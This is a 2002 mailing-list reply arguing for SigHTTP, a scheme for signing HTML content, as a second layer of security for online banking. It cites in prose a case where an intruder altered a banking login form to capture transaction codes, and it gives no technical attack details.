Hi John, Am Freitag den, 21. Juni 2002, um 17:00, schrieb John Stracke: >> And at least I think you are too pessimistic by the small number of >> interested people. I have the impression here in germany are still lots >> of people concerned and frightend everytime some tv magazin reports >> online banking bugs here and security frauds there. If everyone is >> complaining how about solving it in a simple way? > > But this doesn't solve the actual problem--nearly all cracks of online > banks, stores, etc., are *not* done by intercepting HTTP traffic. > They're usually done by exploiting security bugs in the server > software and stealing information out of the databases. sigHTTP would > do nothing about that; in fact, it might exacerbate the problem, by > diverting resources that could instead be spent on securing the > server. Here we had already one case where an intruder changed silently the html programming of a banking portal. He changed the login form in such a way that he was sent the one time transaction code of the money transfer and displayed an successful result by himself from the hijacked web server. The SSL certificate was of no use in this case, it even kept the user in wrong confidence. The SigHTTP would have been a solution for this case. Changing already signed HTML content wold have deleted or modified the signature and a SigHTTP cpapable browser or third party tool would have been given the chance to alert the user. The "best thing" for sure is a perfect hardened server but I think there must be a second layer of security. -- Think Safety www.security-gui.de & www.sighttp.org